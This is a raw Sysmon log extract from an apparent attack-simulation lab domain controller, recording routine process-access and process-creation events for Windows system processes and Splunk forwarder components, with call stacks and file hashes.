14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.769{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.253{59A5CD1D-95F8-6005-7005-00000000A301}59166896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.100{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.098{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.097{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.097{59A5CD1D-95F8-6005-7005-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:49.487{59A5CD1D-95F9-6005-7205-00000000A301}6368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:56.737{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 